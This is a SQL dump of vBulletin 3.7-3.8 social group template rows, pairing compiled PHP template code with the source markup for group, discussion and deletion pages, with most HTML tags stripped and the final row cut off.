(1576, -1, 'socialgroups_category_cloud_bit', 'session->vars[\'sessionurl\'] . \"do=grouplist&cat=$category[categoryid]\\\" class=\\\"sg_catcloudlink sg_catlevel$category[level]\\\">$category[title] ', '$category[title] ', 'template', 1217936989, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1577, -1, 'socialgroups_confirm', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n \r\n \r\n \".(($pictureinfo) ? (\"\r\n \r\n \") : (\"\")).\"\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n \r\n \r\n $title_phrase \r\n \r\n \r\n $question_phrase\".(($extratext) ? (\" $extratext\") : (\"\")).\" \r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n $title_phrase \r\n \r\n \r\n $question_phrase $extratext \r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n$footer\r\n\r\n', 'template', 1208875321, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1578, -1, 'socialgroups_css', '', '', 'template', 1235391495, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
(1579, -1, 'socialgroups_deletemessages', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \".(($inline_discussion) ? (\"\r\n $vbphrase[delete_discussions]\r\n \") : (\"\r\n $vbphrase[delete_messages]\r\n \")).\"\r\n \r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \".(($canremovemessages AND $candeletemessages) ? (\"\r\n
$vbphrase[how_would_you_like_to_delete]
\r\n \") : (\"\")).\"\r\n \".(($candeletemessages) ? (\"\r\n
\r\n $vbphrase[soft_delete_leave_deleted_message] \r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($canremovemessages) ? (\"\r\n
\r\n \r\n $vbphrase[physically_remove]\r\n \r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($candeletemessages) ? (\"\r\n
\r\n $vbphrase[reason_for_deletion]\r\n \r\n \r\n
\r\n \") : (\"\")).\"\r\n
\r\n \r\n\r\n \".(($inline_discussion) ? (\"\r\n
\" . construct_phrase(\"$vbphrase[deleting_x_discussions_from_y_social_groups]\", \"$discussioncount\", \"$groupcount\") . \"
\r\n \") : (\"\r\n
\" . construct_phrase(\"$vbphrase[deleting_x_messages_in_y_discussions_from_z_social_groups]\", \"$messagecount\", \"$discussioncount\", \"$groupcount\") . \"
\r\n \")).\"\r\n \".(($discussion_selected AND !$inline_discussion) ? (\"\r\n
$vbphrase[deleting_the_first_message]
\r\n \") : (\"\")).\"\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[delete_discussions]\r\n \r\n $vbphrase[delete_messages]\r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n
\r\n $vbphrase[how_would_you_like_to_delete]
\r\n \r\n
\r\n \r\n $vbphrase[soft_delete_leave_deleted_message] \r\n
\r\n \r\n\r\n
\r\n \r\n \r\n $vbphrase[physically_remove]\r\n \r\n
\r\n \r\n\r\n
\r\n \r\n $vbphrase[reason_for_deletion]\r\n \r\n \r\n
\r\n \r\n
\r\n \r\n\r\n
\r\n $vbphrase[deleting_x_discussions_from_y_social_groups] \r\n \r\n $vbphrase[deleting_x_messages_in_y_discussions_from_z_social_groups] \r\n \r\n
\r\n $vbphrase[deleting_the_first_message]
\r\n \r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1212494788, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1580, -1, 'socialgroups_discussion', '\r\n $template_hook[group_discussionbit_start]\r\n \r\n \r\n \".(($discussion[\'lastposterid\']) ? (\"\r\n
\" . construct_phrase(\"$vbphrase[by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$discussion[postuserid]\", \"$discussion[postusername]\") . \" \r\n \") : (\"\r\n
$discussion[musername] \r\n \")).\"\r\n
$discussion[date]\".((!$show[\'detailedtime\']) ? (\" $discussion[time] \") : (\"\")).\"
\r\n
\r\n\r\n \".((!$discussion[is_read]) ? (\"\r\n \r\n session->vars[\'sessionurl\'] . \"do=discuss&discussionid=$discussion[discussionid]&goto=$discussion[readtime]#newmessage\\\" id=\\\"thread_gotonew_$discussion[discussionid]\\\" class=\\\"id_goto_unread\\\"> \r\n \".(($discussion[moderated]) ? (\"$vbphrase[moderated_discussion_prefix] \") : (\"\")).\"\r\n $discussion[title] \r\n \r\n \") : (\"\r\n \".(($discussion[moderated]) ? (\"$vbphrase[moderated_discussion_prefix] \") : (\"\")).\"\r\n $discussion[title] \r\n \")).\"\r\n \r\n \".(($show[group]) ? (\"\r\n
\" . construct_phrase(\"$vbphrase[group_x]\", \"group.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"gmid=$discussion[gmid]#gmessage$discussion[gmid]\", \"$discussion[groupname]\") . \"
\r\n \") : (\"\r\n
$discussion[trimmessage]
\r\n \")).\"\r\n
\r\n \r\n\r\n $discussion[replies] \r\n\r\n \r\n\r\n $discussion[lastpostdate] $discussion[lastposttime]
\r\n \r\n \r\n\r\n \".(($discussion[showsubsinfo]) ? (\"\r\n \r\n $discussion[notification] \r\n \r\n \") : (\"\")).\"\r\n \r\n \".(($show[inlinemod]) ? (\"\r\n \".(($discussion[inlinemod]) ? (\" \") : (\"\")).\" \r\n \") : (\"\")).\"\r\n $template_hook[group_discussionbit_end]\r\n ', '\r\n $template_hook[group_discussionbit_start]\r\n \r\n \r\n
\r\n $vbphrase[by_x] \r\n \r\n $discussion[musername] \r\n \r\n
$discussion[date] $discussion[time]
\r\n
\r\n\r\n \r\n \r\n \r\n $vbphrase[moderated_discussion_prefix] \r\n $discussion[title] \r\n \r\n \r\n $vbphrase[moderated_discussion_prefix] \r\n $discussion[title] \r\n \r\n \r\n
\r\n \r\n \r\n $discussion[trimmessage]
\r\n \r\n
\r\n \r\n\r\n $discussion[replies] \r\n\r\n \r\n\r\n $discussion[lastpostdate] $discussion[lastposttime]
\r\n \r\n
\r\n $vbphrase[by_x] \r\n \r\n $discussion[musername] \r\n \r\n
\r\n
\r\n \r\n\r\n \r\n \r\n $discussion[notification] \r\n \r\n \r\n \r\n \r\n alt1 alt2\"> \r\n \r\n $template_hook[group_discussionbit_end]\r\n ', 'template', 1265387382, 'vBulletin Solutions', '3.8.5', 'vbulletin'),
(1581, -1, 'socialgroups_discussionview', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n $socialgroups_css\r\n \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$template_hook[group_discuss_before_messages]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n $messagebits\r\n
\r\n\r\n$template_hook[group_discuss_after_messages]\r\n\r\n\".(($show[\'inlinemod\'] OR $pagenav OR $show[\'postlink\']) ? (\"\r\n \r\n \".(($pagenav) ? (\"\r\n
\r\n $pagenav\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'inlinemod\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'postlink\']) ? (\"
\") : (\"\")).\"\r\n
\r\n\") : (\"\")).\"\r\n\r\n\r\n\".(($show[\'inlinemod\']) ? (\"\r\n \r\n\r\n \".(($show[popups]) ? (\"\r\n \r\n\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n$template_hook[group_discuss_after_action_links]\r\n\r\n\".(($bookmarksites) ? (\"\r\n\r\n \r\n\r\n
\r\n $vbphrase[bookmarks]\r\n
\r\n
\r\n
\r\n\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n$template_hook[group_discuss_after_bookmarks]\r\n\r\n\".(($show[\'quickcomment\']) ? (\"\r\n \r\n
\r\n\r\n $vBeditTemplate[clientscript]\r\n\r\n
session->vars[\'sessionurl\'] . \"do=message\\\" method=\\\"post\\\" id=\\\"message_form\\\">\r\n \r\n
\r\n\r\n
\r\n
\r\n
$vbphrase[posting_message_please_wait] \r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \") : (\"\")).\"\r\n
\r\n\r\n\".(($show[\'edit\'] AND $show[\'popups\']) ? (\"\r\n\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".((!$show[popups]) ? (\"\r\n\r\n \r\n \r\n
\r\n
$vbphrase[discussion_tools]
\r\n
\r\n\r\n \".(($show[subscribe]) ? (\"\r\n \".((!$discussion[subscribed]) ? (\"\r\n
\r\n \") : (\"\r\n
\r\n \")).\"\r\n \") : (\"\")).\"\r\n
\r\n\r\n\") : (\"\")).\"\r\n\r\n$template_hook[group_discuss_after_quick_reply]\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n $vboptions[bbtitle] - $custompagetitle \r\n $socialgroups_css\r\n \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$template_hook[group_discuss_before_messages]\r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[join_group] \r\n \r\n \r\n $vbphrase[group_type_inviteonly]\r\n \r\n \r\n \r\n $discussion[title]\r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n\r\n\r\n\r\n\r\n $messagebits\r\n
\r\n\r\n$template_hook[group_discuss_after_messages]\r\n\r\n\r\n \r\n
\r\n \r\n $pagenav\r\n
\r\n \r\n
\r\n \r\n \r\n
\r\n
\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n$template_hook[group_discuss_after_action_links]\r\n\r\n\r\n\r\n \r\n\r\n
\r\n $vbphrase[bookmarks]\r\n
\r\n
\r\n
\r\n\r\n \r\n\r\n \r\n\r\n$template_hook[group_discuss_after_bookmarks]\r\n\r\n\r\n \r\n
\r\n\r\n $vBeditTemplate[clientscript]\r\n\r\n
\r\n \r\n
\r\n\r\n
\r\n
\r\n
$vbphrase[posting_message_please_wait] \r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n
\r\n
$vbphrase[discussion_tools]
\r\n
\r\n\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n$template_hook[group_discuss_after_quick_reply]\r\n\r\n$footer\r\n\r\n', 'template', 1224606497, 'vBulletin Solutions', '3.8.0 Beta 2', 'vbulletin'),
(1582, -1, 'socialgroups_discussion_deleted', '\r\n \r\n \r\n \".(($discussion[\'lastposterid\']) ? (\"\r\n
\" . construct_phrase(\"$vbphrase[by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$discussion[lastposterid]\", \"$discussion[lastposter]\") . \" \r\n \") : (\"\r\n
$discussion[musername] \r\n \")).\"\r\n
$discussion[date]\".((!$show[\'detailedtime\']) ? (\" $discussion[time] \") : (\"\")).\"
\r\n
\r\n \".(($discussion[moderated]) ? (\"$vbphrase[moderated_discussion_prefix] \") : (\"\")).\"$discussion[title] \r\n \r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[discussion_deleted_by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$discussion[del_userid]\", \"$discussion[del_username]\") . \"\r\n \".(($discussion[\'del_reason\']) ? (\"$vbphrase[reason] : $discussion[del_reason]\") : (\"\")).\"\r\n \r\n
\r\n \r\n\r\n \r\n \" . construct_phrase(\"$vbphrase[discussion_deleted_by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$discussion[del_userid]\", \"$discussion[del_username]\") . \"\r\n \r\n\r\n \".(($show[inlinemod]) ? (\"\r\n \".(($discussion[inlinemod]) ? (\" \") : (\"\")).\" \r\n \") : (\"\")).\"\r\n ', '\r\n \r\n \r\n
\r\n $vbphrase[by_x] \r\n \r\n $discussion[musername] \r\n \r\n
$discussion[date] $discussion[time]
\r\n
\r\n $vbphrase[moderated_discussion_prefix] $discussion[title] \r\n \r\n \r\n
\r\n $vbphrase[discussion_deleted_by_x] \r\n $vbphrase[reason] : $discussion[del_reason] \r\n \r\n
\r\n \r\n\r\n \r\n $vbphrase[discussion_deleted_by_x] \r\n \r\n\r\n \r\n \r\n \r\n ', 'template', 1219079766, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1583, -1, 'socialgroups_discussion_ignored', '\r\n \r\n \r\n \".(($discussion[\'lastposterid\']) ? (\"\r\n
\" . construct_phrase(\"$vbphrase[by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$discussion[lastposterid]\", \"$discussion[lastposter]\") . \" \r\n \") : (\"\r\n
$discussion[musername] \r\n \")).\"\r\n
$discussion[date]\".((!$show[\'detailedtime\']) ? (\" $discussion[time] \") : (\"\")).\"
\r\n
\r\n \r\n \".(($discussion[moderated]) ? (\"$vbphrase[moderated_discussion_prefix] \") : (\"\")).\"$discussion[title]\r\n \r\n
\" . construct_phrase(\"$vbphrase[discussion_hidden_x_on_ignore_list]\", \"$discussion[username]\", \"profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=ignorelist\") . \"
\r\n
\r\n \r\n\r\n $discussion[replies] \r\n\r\n \r\n\r\n $discussion[lastpostdate] $discussion[lastposttime]
\r\n \r\n \r\n\r\n \".(($show[inlinemod]) ? (\"\r\n \".(($discussion[inlinemod]) ? (\" \") : (\"\")).\" \r\n \") : (\"\")).\"\r\n ', '\r\n alt2 alt1\" width=\"100%\" id=\"gdiscussion$discussion[gmid]\" title=\"$discussion[title]\">\r\n \r\n
\r\n $vbphrase[by_x] \r\n \r\n $discussion[musername] \r\n \r\n
$discussion[date] $discussion[time]
\r\n
\r\n \r\n $vbphrase[moderated_discussion_prefix] $discussion[title]\r\n \r\n
$vbphrase[discussion_hidden_x_on_ignore_list] \r\n
\r\n \r\n\r\n $discussion[replies] \r\n\r\n \r\n\r\n $discussion[lastpostdate] $discussion[lastposttime]
\r\n \r\n
\r\n $vbphrase[by_x] \r\n \r\n $discussion[musername] \r\n \r\n
\r\n
\r\n \r\n\r\n \r\n \r\n \r\n ', 'template', 1219079779, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1584, -1, 'socialgroups_discussion_quickedit', '\".(($show[\'quick_edit_form_tag\']) ? (\"\") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n \".(($show[\'editor_toolbar\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n
\r\n
$vbphrase[reason_for_editing]:
\r\n
\r\n
\r\n
$newpost[message]
\r\n
\r\n\r\n \r\n\r\n \r\n\r\n \".(($show[\'deletepostoption\']) ? (\"\r\n \r\n\r\n
\r\n\r\n
\r\n
$vbphrase[delete_message_check_appropriate_option]
\r\n \".(($show[\'firstpostnote\']) ? (\"\r\n
$vbphrase[deleting_message_deletion_of_thread]
\r\n \") : (\"\")).\"\r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \r\n\r\n
\r\n\r\n
\r\n \") : (\"\")).\"\r\n\r\n \r\n \r\n
\r\n\r\n\".(($show[\'quick_edit_form_tag\']) ? (\" \") : (\"\")).\"', ' \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n
\r\n
$vbphrase[reason_for_editing]:
\r\n
\r\n
\r\n
$newpost[message]
\r\n
\r\n\r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n
\r\n\r\n
\r\n
$vbphrase[delete_message_check_appropriate_option]
\r\n
\r\n $vbphrase[deleting_message_deletion_of_thread]
\r\n \r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \r\n\r\n
\r\n\r\n
\r\n \r\n\r\n \r\n \r\n
\r\n\r\n ', 'template', 1218454995, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1585, -1, 'socialgroups_editor', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle \r\n\r\n\r\n$header\r\n\r\n$navbar\r\n\r\n\".(($show[\'delete\'] OR $show[\'physicaldeleteoption\']) ? (\"\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \".(($delete_discussion) ? (\"\r\n $vbphrase[delete_group_discussion]\r\n \") : (\"\r\n $vbphrase[delete_message]\r\n \")).\"\r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n \".(($delete_discussion) ? (\"\r\n $vbphrase[delete_discussion_check_appropriate_option]\r\n \") : (\"\r\n $vbphrase[delete_message_check_appropriate_option]\r\n \")).\"\r\n\r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \r\n\r\n
\r\n
$vbphrase[reason_for_deletion]:
\r\n
\r\n
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n$postpreview\r\n\r\noptions[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n\r\n\r\n\".(($show[\'additional_options\']) ? (\"\r\n \r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n\".(($messagebits) ? (\"\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[message_dialog]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n\r\n $messagebits\r\n\r\n
\r\n \r\n \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle \r\n\r\n\r\n$header\r\n\r\n$navbar\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[delete_group_discussion]\r\n \r\n $vbphrase[delete_message]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n \r\n $vbphrase[delete_discussion_check_appropriate_option]\r\n \r\n $vbphrase[delete_message_check_appropriate_option]\r\n \r\n\r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \r\n\r\n
\r\n
$vbphrase[reason_for_deletion]:
\r\n
\r\n
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n\r\n$postpreview\r\n\r\n onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, $vboptions[postminchars])\" >\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[message_dialog]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n\r\n $messagebits\r\n\r\n
\r\n \r\n \r\n \r\n
\r\n \r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1221757660, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1586, -1, 'socialgroups_form', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".((!$icononly) ? (\"\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\") : (\"\")).\"\r\n\r\n\".(($show[editicon]) ? (\"\r\n\".((!$icononly) ? (\" \") : (\"\")).\"\r\n\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $custompagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n\r\n$footer\r\n\r\n', 'template', 1227096129, 'vBulletin Solutions', '3.8.0 Beta 3', 'vbulletin'),
(1587, -1, 'socialgroups_group', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n $socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'groupinfo\']) ? (\"\r\n \r\n
\r\n\r\n \r\n
\r\n \".(($groupiconurl) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n
$group[name] \r\n
\" . construct_phrase(\"$vbphrase[group_maintained_by_x]\", \"$ownerlink\", \"$group[creatorusername]\") . \"
\r\n \".(($group[\'description\']) ? (\"\r\n
$group[description]
\r\n \") : (\"\")).\"\r\n
\r\n\r\n \r\n
\r\n\r\n
\r\n\r\n \r\n \".(($show[\'pictures_block\']) ? (\"\r\n
\r\n
\r\n \".(($pictures_shown) ? (\"\r\n \" . construct_phrase(\"$vbphrase[showing_x_of_y_pictures]\", \"$pictures_shown\", \"$group[picturecount]\") . \"\r\n \") : (\"\r\n $vbphrase[group_pictures]\r\n \")).\"\r\n
\r\n
\r\n \") : (\"\")).\"\r\n\r\n
\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\".(($show[\'groupdiscussions\']) ? (\"\r\n \r\n \r\n\r\n \".(($messagebits) ? (\"\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n $template_hook[group_discussionlist_start_col]\r\n \r\n \".(($messagetotal) ? (\"\r\n $vbphrase[group_created] $sortarrow[dateline] \r\n \".(($messagestart > 1) ? (\"\r\n \" . construct_phrase(\"$vbphrase[showing_discussions_x_to_y_of_z]\", \"$messagestart\", \"$messageend\", \"$messagetotal\") . \"\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[showing_discussions_x_of_y]\", \"$messageshown\", \"$messagetotal\") . \"\r\n \")).\"\r\n \") : (\"\")).\"\r\n \r\n \r\n $vbphrase[replies] $sortarrow[replies]\r\n \r\n \r\n $vbphrase[last_post] $sortarrow[lastpost]\r\n \r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n $template_hook[group_discussionlist_end_col]\r\n \r\n $messagebits\r\n
\r\n\r\n \".(($show[\'inlinemod\'] OR $pagenav OR $show[\'postlink\']) ? (\"\r\n \r\n \".(($pagenav) ? (\"\r\n
\r\n $pagenav\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'inlinemod\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'postlink\']) ? (\"
\") : (\"\")).\"\r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \".(($show[popups]) ? (\"\r\n \r\n \r\n\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n\") : (\"\r\n \r\n
\r\n \".(($searchtext) ? (\"\r\n $vbphrase[no_discussions_found]\r\n \") : (\"\r\n $vbphrase[group_has_no_discussions]\r\n \")).\"\r\n
\r\n
\r\n \".(($show[\'postlink\']) ? (\"\") : (\"\")).\"\r\n\")).\"\r\n\r\n\".(($show[popups]) ? (\"\r\n\r\n\r\n\r\n\") : (\"\r\n\r\n \r\n\r\n
\r\n
$vbphrase[group_tools]
\r\n
\r\n \".(($show[subscribe]) ? (\"\r\n \".((!$group[subscribed]) ? (\"\r\n
\r\n \") : (\"\r\n
\r\n \")).\"\r\n \") : (\"\")).\"\r\n
\r\n\")).\"\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n\".((!$group[\'canviewcontent\']) ? (\"\r\n \r\n
\r\n $vbphrase[must_join_to_view]\r\n
\r\n
\r\n\") : (\"\")).\"\r\n\r\n \".(($show[\'groupoptions\']) ? (\"\r\n\r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle \r\n $socialgroups_css\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n \r\n
\r\n\r\n \r\n
\r\n
\r\n \r\n \r\n
$group[name] \r\n
$vbphrase[group_maintained_by_x] \r\n
\r\n $group[description]
\r\n \r\n
\r\n\r\n \r\n
\r\n\r\n
\r\n\r\n \r\n
\r\n \r\n
\r\n
\r\n $vbphrase[showing_x_of_y_pictures] \r\n \r\n $vbphrase[group_pictures]\r\n \r\n
\r\n \r\n \r\n\r\n
\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n $template_hook[group_discussionlist_start_col]\r\n \r\n \r\n $vbphrase[group_created] $sortarrow[dateline] \r\n 1\">\r\n $vbphrase[showing_discussions_x_to_y_of_z] \r\n \r\n $vbphrase[showing_discussions_x_of_y] \r\n \r\n \r\n \r\n \r\n $vbphrase[replies] $sortarrow[replies]\r\n \r\n \r\n $vbphrase[last_post] $sortarrow[lastpost]\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n $template_hook[group_discussionlist_end_col]\r\n \r\n $messagebits\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n $pagenav\r\n
\r\n \r\n
\r\n \r\n \r\n
\r\n
\r\n \r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n $vbphrase[no_discussions_found]\r\n \r\n $vbphrase[group_has_no_discussions]\r\n \r\n
\r\n
\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n
\r\n
$vbphrase[group_tools]
\r\n
\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n
\r\n $vbphrase[must_join_to_view]\r\n
\r\n
\r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n$footer\r\n\r\n', 'template', 1234873522, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
(1588, -1, 'socialgroups_grouplist_bit', '\r\n \r\n \".(($group[iconurl]) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[category_names]) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=grouplist&cat=$group[categoryid]\\\" style=\\\"font-weight:normal\\\">$group[categoryname] \r\n \") : (\"\")).\"\r\n \r\n\r\n $group[mediumdescription]
\r\n\r\n \r\n session->vars[\'sessionurl\'] . \"do=viewmembers&groupid=$group[groupid]\\\">$group[members] \r\n \".(($show[\'gminfo\']) ? (\"\r\n $group[discussions] \r\n $group[visible] \r\n \") : (\"\")).\"\r\n \".(($show[\'pictureinfo\']) ? (\"\".(($group[\'picturecount\']) ? (\"session->vars[\'sessionurl\'] . \"do=grouppictures&groupid=$group[groupid]\\\">$group[picturecount] \") : (\"$group[picturecount]\")).\" \") : (\"\")).\"\r\n\r\n \".(($show[\'gminfo\']) ? (\"\r\n \r\n \".(($show[\'lastpostinfo\']) ? (\"\r\n \r\n $group[lastpostdate]\r\n \".((!$show[\'detailedtime\']) ? (\"\r\n $group[lastposttime] \r\n \") : (\"\")).\"\r\n
\r\n \") : (\"\r\n \r\n $group[createdate]\r\n
